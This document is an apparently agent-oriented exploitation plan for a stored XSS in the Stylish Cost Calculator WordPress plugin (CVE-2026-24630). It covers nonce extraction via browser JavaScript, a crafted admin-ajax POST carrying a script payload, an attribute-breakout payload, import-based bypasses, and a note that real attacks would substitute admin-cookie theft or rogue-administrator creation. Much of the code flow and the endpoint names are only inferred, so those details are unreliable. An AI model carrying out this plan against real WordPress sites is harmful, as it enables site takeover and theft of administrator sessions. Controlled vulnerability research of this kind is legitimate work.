Vulnerability Research Plan: CVE-2026-24630 - Stylish Cost Calculator Stored XSS

1. Vulnerability Summary

The Stylish Cost Calculator plugin (versions <= 8.1.9) contains a stored Cross-Site Scripting (XSS) vulnerability. The flaw exists because the plugin fails to properly sanitize and escape user-supplied data when saving calculator configurations and subsequently rendering them. Authenticated users with Contributor-level permissions or higher can inject arbitrary JavaScript into calculator settings (e.g., element labels, custom HTML fields, or calculator names). This script executes when an administrator views the calculator in the backend or when any user views a page where the malicious calculator is embedded via shortcode.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: scc_save_calculator (inferred based on plugin architecture) or a similar AJAX action registered for saving calculator metadata.
• Vulnerable Parameter: Likely a field within the calculator_data or form_data POST parameters (e.g., element_label, section_title, or custom_html).
• Authentication Level: Authenticated (Contributor+). Contributors in WordPress can typically access the plugin's calculator editor if the plugin doesn't strictly enforce manage_options capabilities for all views.
• Precondition: The plugin must be active, and the attacker must have a valid login for a Contributor-level account.

3. Code Flow (Inferred)

1. Registration: The plugin registers an AJAX handler via add_action('wp_ajax_scc_save_calculator', ...).
2. Input: The handler function (likely in admin/class-admin.php or a dedicated AJAX controller) retrieves data from $_POST['calculator_json'] or $_POST['settings'].
3. Persistence: The data is saved to the database using update_option() or update_post_meta() without undergoing wp_kses() or sanitize_text_field() on the specific sub-fields containing the payload.
4. Output (Frontend): When a user visits a page with the shortcode [stylish-cost-calculator id="XX"], the plugin retrieves the settings and echoes them.
5. Sink: The vulnerable data is printed using echo or printf without escaping functions like esc_html() or esc_attr().

4. Nonce Acquisition Strategy

To exploit the AJAX endpoint, a valid WordPress nonce associated with the plugin's admin actions is required.

1. Preparation: Create a page with the plugin's primary shortcode to ensure all scripts and localized variables are loaded.
   • wp post create --post_type=page --post_title="XSS Loader" --post_status=publish --post_content='[stylish-cost-calculator id="1"]'
2. Navigation: Use browser_navigate to go to the WordPress login page, authenticate as a Contributor, and then navigate to the "XSS Loader" page or the Plugin's management page in /wp-admin/.
3. Extraction: Stylish Cost Calculator typically localizes its settings in a global JS object. Use browser_eval to extract the nonce:
   • Check for: window.scc_admin_params?.nonce
   • Check for: window.scc_vars?.ajax_nonce
   • Check for: window.stylish_cost_calculator_params?.nonce
4. Action String: The nonce is likely generated for the action scc_nonce or stylish_cost_calculator_save.

5. Exploitation Strategy

Step 1: Authentication

Authenticate the http_request tool by providing the Contributor's session cookies.

Step 2: Inject Payload

Send a POST request to admin-ajax.php to update an existing calculator or create a new one with a payload.

Example Request:

• URL: https://<target>/wp-admin/admin-ajax.php
• Method: POST
• Headers: Content-Type: application/x-www-form-urlencoded
• Body:

  action=scc_save_calculator&
  nonce=[EXTRACTED_NONCE]&
  calculator_id=1&
  calculator_data={"elements":[{"type":"heading","label":"<script>alert(document.domain)</script>"}]}
  

  (Note: The exact structure of calculator_data must match the plugin's expected JSON schema, often found in assets/js/admin.js).

Step 3: Trigger Execution

1. Navigate to the frontend page containing the shortcode: https://<target>/xss-loader/.
2. Verify if the script executes in the browser context.

6. Test Data Setup

1. User Creation:
   • wp user create attacker attacker@example.com --role=contributor --user_pass=password123
2. Initial Calculator: Create at least one calculator so an ID exists.
   • wp stylish-cost-calculator create --name="Test Calc" (if CLI exists) or manually via the UI.
3. Page Creation:
   • wp post create --post_type=page --post_title="XSS Test" --post_content='[stylish-cost-calculator id="1"]' --post_status=publish

7. Expected Results

• The scc_save_calculator request should return a successful JSON response (e.g., {"success":true}).
• When viewing the page XSS Test, a JavaScript alert box displaying the domain name should appear.
• In a real-world scenario, the payload would be replaced with an admin-cookie exfiltration script or a CSRF script to create a new administrator.

8. Verification Steps

1. Check Database: Verify the payload is stored raw in the wp_options or wp_postmeta table.
   • wp db query "SELECT option_value FROM wp_options WHERE option_name LIKE '%scc_calculator_%'"
2. Source Code Inspection: Fetch the frontend page and check for the unescaped script tag.
   • Use http_request (GET) and search the body for <script>alert(document.domain)</script>.

9. Alternative Approaches

• Settings XSS: If scc_save_calculator is restricted, check for wp_ajax_scc_save_settings. Many plugins allow lower-privileged users to modify "Global Settings" that are reflected on all calculators.
• Attribute Breakout: If <script> is filtered, attempt attribute injection in a label:
  • Payload: "><img src=x onerror=alert(1)>
• Import/Export: SCC often has an import feature. Attempt to upload a malicious .json or .txt configuration file containing the XSS payload. This often bypasses standard AJAX sanitization.